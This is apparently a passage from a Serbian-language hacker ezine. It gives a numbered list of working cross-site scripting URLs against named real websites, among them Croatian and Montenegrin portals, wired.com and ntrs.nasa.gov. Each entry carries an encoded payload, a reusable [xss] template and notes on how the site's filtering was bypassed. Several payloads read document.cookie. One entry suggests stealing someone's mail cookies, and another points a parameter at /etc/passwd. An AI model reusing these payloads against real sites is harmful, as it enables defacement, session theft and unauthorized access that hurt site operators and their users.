%3E%3Cbr%3E%3Cimg%20src=http://pointglow.com/dRake/mafioso.jpg%3E%3Cbr%3E%3Cbr%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E

Za ovaj drugi sam vam dao malo igranja da i 'dekriptujete' da bi videli 
sta sam radio, inace samo sam bacio txt na stranu jer nemam vremena malko 
zurim treba da zavrsim nesto,ali vi se mozete igrati i pokusavati da izvarate 
sistem...

2.)  http://www.tinejdzerke.net/video.php?op=%3C%2F%74%64%3E%3C%2F%74%72%3E%3C%2F%74
%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%3C%2F%74%64%3E%3C%63%65%6E%74%65%72%3E%3C%62
%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%66%6F%6E%74%20%73%69%7A%65%3D%22%31%30
%22%3E%3C%62%3E%4B%52%53%48%20%53%41%4A%54%20%4A%45%4C%44%41%3F%20%3B%70%3C%2F%62%3E
%3C%2F%66%6F%6E%74%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C
%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E%3C%62%72%3E

3.)  http://www.mtsmondo.com/mmedia/login1.asp?w=%22%3E%3Cscript%3Ealert('so l33t dR
     ejk')%3C/script%3E&stat=getcode
     http://www.mtsmondo.com/mmedia/login1.asp?w=[xss]&stat=getcode

  -Greska u $w promenljivoj u login1.asp. Potrebno je samo zapoceti sa "> cime 
   zavrsavate upit i dalje mozete insertovati kod koji zelite. :>

4.)  http://www.download.cg.yu/?akcija=list&sort=1&keyword=%22%3E%3C/a%3E%3C/span%3E
%3C/td%3E%3C/tr%3E%3C/table%3E%3C/td%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter
%3E%3Cfont%20size=%229%22%3E%3Cb%3Ehahahah%20crnogorci%20:)%3Cbr%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr     %3E%3C/b%3E%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E&id=%3C/a%3E&licenca=     %3C/a%3E&kategorija=%3C/a%3E&od=%3C/a%3E&do=%3C/a%3E
  http://www.download.cg.yu/?akcija=list&sort=1&keyword=%22%3E[XSS]&id=%3C/a%3E&licenc
a=%3C/a%3E&kategorija=%3C/a%3E&od=%3C/a%3E&do=%3C/a%3E

  -Greska u filtriranju keyword promenljive. Potrebno je samo da izvrsite pretragu 
   zapocinjuci je sa: "> i dalje insertovati vas XSS kod.. :O

5.) http://www.srpko.com/cgi-bin/srpko.pl?terms=%22%3E'%3Cscript%3Ealert('aj%20em%20
sou%20strong%20drejk')%3C/script%3E

http://www.srpko.com/cgi-bin/srpko.pl?terms=[xss]

  -Ehh... Mislio sam da je srpko jachi od ovog :) Samo prekinite upit sa "> i dalje 
   injectujte vas XSS.

6.) http://freemail.net.hr/net.cgi?cmd=list&utoken=[onaj koji dobijete po loginu]&fl
d=[XSS]&pos=1&pos=1

  -Greska u prosledjivanju fld promenljive u fajlu net.cgi.

7.) http://webimenik.net.hr/search_rd.jsp?ct=Imenik&q=%22%27%3E%3Cscript%3Ealert%28'dRak
e:%20ajm%20sou%20strong%20drejk%20:%3E'%29%3C%2Fscript%3E%3Cbr%3E%3C/tr%3E%3C/td%3E%
3C/table%3E%3Cimg%20src=%22http://pointglow.com/dRake/mafioso.jpg%22%3E%3Cbr%3E%3Cbr
%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E&x=31&y=15&st=simple&fh=1

webimenik.net.hr/search_rd.jsp?ct=Imenik&q=%22%27%3E[XSS]&x=31&y=15&st=simple&fh=1

  -and again... net.hr.. Ej.. stani.. kako ovo? Zar ovo ne bi trebalo da bude najjaci 
   hr sajt? :) heheh..

8.)  http://www.nic.yu/cgi-bin/checkavail-s.cgi?domain=%3Cscript%3Ealert('lolz')%3C/script
%3E&suffix=%3Cscript%3Ealert('hahahah')%3C/script%3E&x=20&y=9
http://www.nic.yu/cgi-bin/checkavail-s.cgi?domain=[xss]&suffix=[xss]&x=20&y=9

  -Greske su sto nisu filtrirali promenljive $domain i $suffix. Al dobro ovime nista 
   necete moci da uradite, ali kao zanimacija nije lose igrati se :>

9.)  http://www.rtcg.org/index.php?akcija=vijesti&datum=%3Ccenter%3E%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E%3Cbr%3E%3CBr%3E%3CbR%3E%3Cfont%20size=99%3EdRake%20;0
%3C/font%3E%3Cbr%3E%3Cimg%20src=http://pointglow.com/dRake/mafioso.jpg%3E-09-02
http://www.rtcg.org/index.php?akcija=vijesti&datum=[xss]

  -Ehhh... $datum nije filtriran... ccc.. ;0

10.) 
http://www.polarotor.co.yu/index.php?option=com_poll&task=results&id=14&mosmsg=STETA
%20STO%20FILTRIRA%20SVE%20ZNAKOVE%20:(((%20
http://[SAJT SA JOOMLOM-MAMBOOM]/index.php?option=com_poll&task=results&id=14
&mosmsg=[xss.. ovaj, plain txt;p]

  - Steta sto filtrira bukvalno sve html tagove.. nisam (za citavih par min kolko 
    gledam;p) uspeo da izvalim kako ako je uopste moguce da insertujem html tagove. 
    Uglavnom... Zanimljivo je sto makar nesto mozete sto ne bi smeli ;p Inace bug 
    je u com_poll-u modulu za joomla / cms-mambo cms.

11.) 
http://www.wired.com/support/feedback.html?headline=%3Cscript%3Ealert(document.cookie)
%3C/script%3E&story_id=71714&section_path=/etc/passwd&ftype=feedback&msg_type=2

http://www.wired.com/support/feedback.html?headline=[xss]&story_id=71714
&section_path=[moguci pregled fajlova na serveru.. moguci;p]&ftype=feedback&msg_type=2

  - Sada je disableovan, ali trebalo bi da ste u mogucnosti, ako ne poprave, da 
    includeujete html kod. NEISPROBANO, 95% ce imati bug ;).

12.) 
http://moj.siol.net/login.aspx?cams_login_failed=true&cams_login_config=http
&cams_original_url=http%3A%2F%2Fgoogle.com&cams_login_failed_message=%3Cimg%20
src=%22http://pointglow.com/dRake/mafioso.jpg%22%3E%3Cscript%3Ealert(%22lolz...
%20dRejk%20em%20aj%20;0%22)%3C/script%3E&cams_security_domain=system&cams_reason=7

http://moj.siol.net/login.aspx?cams_login_failed=true&cams_login_config=http
&cams_original_url=http%3A%2F%2Fgoogle.com&cams_login_failed_message=[XSS]
&cams_security_domain=system&cams_reason=7

  - Da li je potrebno jovo nanovo objasnjavati i ovaj posebno ? :) Nema htmlspecialchars 
    niti bilo kakvog filtera...ccc ;p

13.) 
http://ulaznice.net.hr/index.asp?page=search&search=%22%3E%3Cscript%3Ealert('heh%20mo
zete%20koristiti%20ovo%20da%20uzmete%20nekom%20cookie%20sa%20maila%20na%20iskonu%20:P
%20%20%20%20%20%20%20%20dRake')%3C/script%3E
http://ulaznice.net.hr/index.asp?page=search&search=[XSS]

  - Da da... net.hr again :) someone just dont know how to protect themselves ;p. 
    Mozete uzeti cookie nekom sa mejla pomocu ovog buga.. Bar bi trebalo da mozete 
    nisam imao vremena da isprobavam objavljivanje zinea je kroz koji minut sada
    dodajem ovo :)


14.) http://www.itsvet.com/Kucista/nw-comp_comp_case/%22%3E%3C/a%3E%3Cscript%20%3Ealert
(document.cookie)%3C/script%3E%3C/table%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3C
font%20size=999%3E%3Cb%3EdRake%20shows%20u%20html%20inclusion%20aka%20xss%20:0%3C
/b%3E%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3
Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
http://www.itsvet.com/Kucista/nw-comp_comp_case/%22%3E%3C/a%3E[xss]

  - itsvet.com, nije koriscen htmlspecialchars, jedini karakteri koji su filtrirani 
    na ovom sajtu su " i ', i zatvorena zagrada na <script> tagu. Sto sam zaobisao 
    jednostavnim dodavanjem praznog prostora (%20). Naime nacin na koji se na sajtu 
    prikazuju podaci je ranjiv jer primeticete nije regularan, nema promenljivih, 
    njihovih vrednosti, etc. Naime posto se prikazuje direktno iz url-a moguce je 
    sploitovati aplikaciju dodavanjem znaka "> sto se pretvara u \"> na serveru i 
    cime link postaje <a href="blabla\">, cime, kao sto vidite zatvaramo <A> tag. 
    Da bi ga prekinuli dodao sam </a> tag, i najzad sve sledece sto kucate ce biti 
    includeovano u html kod stranice. ;p

15.) 
http://ntrs.nasa.gov/index.cgi?method=search&offset=0&mode=advanced&title=%22%3E%3C
script%3Ealert('dRake: Eto... dosta je demonstracija o xss-u :)')</script><br><br>
<center><br><img src="http://pointglow.com/dRake/mafioso.jpg">&creator=&date=&type=
&description=&accessionID=&docID=&boolean=and&orderby=date&order=DESC&limit=25
&archives=genesis.jpl.nasa.gov&archives=atrs&archives=casi&archives=dtrs.dfrc.nasa.
gov&archives=gtrs&archives=jpl-trs.jpl.nasa.gov&archives=jtrs&archives=ktrs
&archives=ltrs.larc.nasa.gov&archives=mtrs&archives=ssctrs&archives=naca.larc.nasa.gov

http://ntrs.nasa.gov/index.cgi?method=search&offset=0&mode=advanced&title=[XSS]
&creator=[XSS]&date=[XSS...]&type=&description=&accessionID=&docID=&boolean=and
&orderby=date&order=DESC&limit=25&archives=genesis.jpl.nasa.gov&archives=atrs
&archives=casi&archives=dtrs.dfrc.nasa.gov&archives=gtrs&archives=jpl-trs.jpl.nasa.gov
&archives=jtrs&archives=ktrs&archives=ltrs.larc.nasa.gov&archives=mtrs&archives=ssctrs
&archives=naca.larc.nasa.gov

  - Niste 'rsli jeste nasa.gov ;0. Ehhh... Kuda ide ovaj svet... I tako... nadam se 
    da ste sad skontali koliko aplikacija pati od xss-a iliti html inclusion-a. 
    Pa... Dosta od mene :> Vezbajte istrazujte, igrajte se malo, jer to ovo i jeste.. 
    Igra "Who is smarter coder, you or them?" ;0 Skroz kewl zar ne. Eto dalje mogu 
    samo da kazem da imate korisne kodove na [ha.ckers.org/xss.html] Sto se tice XSS-a 
    i da se polako odjavljujem... Adios amigos..






////////////////////////////////////////////////////////////////////////////
--==<[ 0x07 Odvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\  
              
Kao sto ste videli gore mogucnosti su bukvalno OGROMNE za uspesan xss napad, 
tako da jedino je potrebna kombinacija  enkodovanih karaktera, sto i da 
napisete skriptu koja ce to raditi za vas, moze potrajati decenijama da 
isproba svaku mogucnost, tako da je najbolje da stvar prepustite osecaju. 
Znaci srecno citanje koda aplikacija i trazenje bugova :). Sto vise pokusavate 
to cete steci vece iskustvo tako da vam preporucujem da sto vise trudite u 
pwnanju neke aplikacije ;p. Iako posle 100 pokusaja ne uspete da nadjete 
nista, ne ocajavajte niste nasli nista, nasli ste jos 100 nacina na koji 
nemoze da se iskoristi, i samim tim bogatite svoje znanje i na kraju cete i 
naci nacin koji radi. 

 Greetz goez to:   

pAkMeN, i`see`s2pid`ppL, MasterRW, dejangex, _bl00dz3r0_, freestyle, smr[a]d, 
passwd, Alex, XentoniX, Limp_Bizkit, dj_my_soul, m4rk0, Only, #linux, 
Aureus_Rector, s1ck, mefisto, _1r0nm4n_, ma svima koji me znaju i naravno autorima 
Phearless eZinea.

                              ...over'n'out...

'Everything is possible, you just need to find a way how to do it...'
                                                  -dRake aka zark0vac